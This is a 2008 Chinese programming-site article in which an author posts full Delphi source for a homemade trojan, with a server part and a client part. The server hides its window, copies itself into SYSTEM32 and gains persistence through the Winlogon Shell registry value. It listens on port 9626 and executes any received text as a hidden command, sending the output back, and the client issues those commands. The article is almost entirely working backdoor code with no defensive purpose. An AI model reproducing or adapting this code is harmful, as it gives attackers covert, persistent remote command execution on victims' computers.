Delphi下“培养”自己的简单木马

  • 来源: 编程中国 作者: 若水   2008-05-04/16:12
  • 刚学电脑时很喜欢网络安全,看着高手们写的一个又一个攻击工具,自己也总想努力去学好编程去写属于自己的程序。学DELPHI快一年了,感觉什么都没学到,惭愧啊。今晚突然想学着写木马,于是手忙脚乱的敲了点代码,超简单,愿自己能越写越好!!!

     

    程序跟传统木马一样,分服务端和客户端。运行服务端后会复制自身到SYSTEM32目录下面,并在注册表添加一自动行启动项,打开本机9626端口开始等待接收客户端的数据。当接收到客户端数据时就当作CMD命令去执行,最后把回显传送回客户端。客户端很简单,跟服务端连接成功后,输入命令点执行,正常的话可以收到服务端的执行结果了。

     

    MM

    源码如下:

    ////Server.pas//////////////

    unit UtMain;

    ////////////////////////////////////
    //////////BY lanyus////////////////
    ////////Email:greathjw@163.com////
    ////////QQ:231221////////////////
    ///部分代码从网上收集///////////
    ////////////////////////////////

    interface

    uses
      Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
      Dialogs, Registry, ScktComp, StdCtrls;

    type
      TFmMain = class(TForm)
        SS: TServerSocket;
        Memo1: TMemo;
        procedure FormCreate(Sender: TObject);
        procedure SSAccept(Sender: TObject; Socket: TCustomWinSocket);
        procedure SSClientRead(Sender: TObject; Socket: TCustomWinSocket);
      private
        { Private declarations }
      public
        { Public declarations }
      end;

    var
      FmMain: TFmMain;
      reg:TRegistry;

    implementation

    {$R *.dfm}

    procedure TFmMain.FormCreate(Sender: TObject);
    var
    sysdir:array[0..50] of char;
    begin
      Application.ShowMainForm:=False;
      FmMain.Left:=-200;          //运行不显示窗口
      reg:=TRegistry.Create;
      reg.RootKey:=HKEY_LOCAL_MACHINE;
      reg.OpenKey('SoftWare\Microsoft\Windows NT\CurrentVersion\Winlogon',true);
      if reg.ReadString('Shell')<> 'Explorer.exe Lysvr.exe' then
        reg.WriteString('Shell','Explorer.exe Lysvr.exe');   //建立开机启动项
      reg.Free;
      GetSystemDirectory(sysdir,50);
      if not FileExists(sysdir+'\Lysvr.exe') then
        copyfile(Pchar(Application.exeName),pchar(sysdir+'\Lysvr.exe'),true);

      SS.Port:=9626;
      try
        SS.Active:=True;
      except
      end;
    end;

    procedure TFmMain.SSAccept(Sender: TObject; Socket: TCustomWinSocket);
    begin
      Socket.SendText('连接成功');   //发现有连接时回传‘连接成功 ’
    end;

    procedure TFmMain.SSClientRead(Sender: TObject; Socket: TCustomWinSocket);
    var
    RemoteCmd:string;
    hReadPipe,hWritePipe:THandle;
    si:STARTUPINFO;
    lsa:SECURITY_ATTRIBUTES;
    pi:PROCESS_INFORMATION;
    cchReadBuffer:DWORD;
    ph:PChar;
    fname:PChar;
    res:string;
    begin
      Memo1.Clear;
      remotecmd:=Socket.ReceiveText;
      fname:=allocmem(255);
      ph:=AllocMem(5000);
      lsa.nLength  :=sizeof(SECURITY_ATTRIBUTES);
      lsa.lpSecurityDescriptor  :=nil;
      lsa.bInheritHandle  :=True;
      if  CreatePipe(hReadPipe,hWritePipe,@lsa,0)=false  then
      begin
        socket.SendText('不能创建管道');
        exit;
      end;
      fillchar(si,sizeof(STARTUPINFO),0);
      si.cb:=sizeof(STARTUPINFO);
      si.dwFlags:=(STARTF_USESTDHANDLES  or  STARTF_USESHOWWINDOW);
      si.wShowWindow:=SW_HIDE;
      si.hStdOutput:=hWritePipe;
      StrPCopy(fname,remotecmd);
      /////执行CMD命令////
      if CreateProcess(nil,fname,nil,nil,true,0,nil,nil,si,pi)=False then
      begin
        socket.SendText('不能创建进程');
        FreeMem(ph);
        FreeMem(fname);
        Exit;
      end;
      while(true)  do
      begin
      if  not  PeekNamedPipe(hReadPipe,ph,1,@cchReadBuffer,nil,nil)  then  break;
      if  cchReadBuffer<>0  then
      begin
      if  ReadFile(hReadPipe,ph^,4096,cchReadBuffer,nil)=false  then  break;
        ph[cchReadbuffer]:=chr(0);
        Memo1.Lines.Add(ph);
      end
      else
      if(WaitForSingleObject(pi.hProcess  ,0)=WAIT_OBJECT_0)  then  break;
        Sleep(100);
      end;
      ph[cchReadBuffer]:=chr(0);
      Memo1.Lines.Add(ph);    //memo接收回显
      CloseHandle(hReadPipe);#p#分页标题#e#
      CloseHandle(pi.hThread);
      CloseHandle(pi.hProcess);
      CloseHandle(hWritePipe);
      FreeMem(ph);
      FreeMem(fname);
      socket.SendText(Memo1.Text);  ///将回显发送回客户端
    end;

    end.

    ///////////////////////////////////////////////////////////////////////////////////////////

    //////客户端/////////////////////

    unit UtMain;

    ////////////////////////////////////
    //////////BY lanyus////////////////
    ////////Email:greathjw@163.com////
    ////////QQ:231221////////////////
    ////////////////////////////////

    interface

    uses
      Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
      Dialogs, OleCtrls, SHDocVw, StdCtrls, IdBaseComponent, IdComponent,
      IdUDPBase, IdUDPServer, Buttons, TLHelp32, ScktComp;

    type
      TFmMain = class(TForm)
        WebBrowser1: TWebBrowser;
        Label3: TLabel;
        Edit2: TEdit;
        Label4: TLabel;
        Edit3: TEdit;
        Button2: TButton;
        CS: TClientSocket;
        Edit4: TEdit;
        Label5: TLabel;
        Memo1: TMemo;
        BitBtn2: TBitBtn;
        procedure Button2Click(Sender: TObject);
        procedure CSRead(Sender: TObject; Socket: TCustomWinSocket);
        procedure BitBtn2Click(Sender: TObject);
      private
        { Private declarations }
      public
        { Public declarations }
      end;

    var
      FmMain: TFmMain;

    implementation

    {$R *.dfm}

    procedure TFmMain.Button2Click(Sender: TObject);
    begin
      CS.Host:=Edit2.Text;
      CS.Port:=StrToInt(Edit3.Text);
      CS.Open;
    end;

    procedure TFmMain.CSRead(Sender: TObject; Socket: TCustomWinSocket);
    begin
      Memo1.Clear;
      Memo1.Lines.Add(Socket.ReceiveText);
      Memo1.Lines.Add('');
    end;

    procedure TFmMain.BitBtn2Click(Sender: TObject);
    begin
      CS.Socket.SendText(edit4.Text);
    end;

    end.


    评论 {{userinfo.comments}}

    {{money}}

    {{question.question}}

    A {{question.A}}
    B {{question.B}}
    C {{question.C}}
    D {{question.D}}
    提交

    驱动号 更多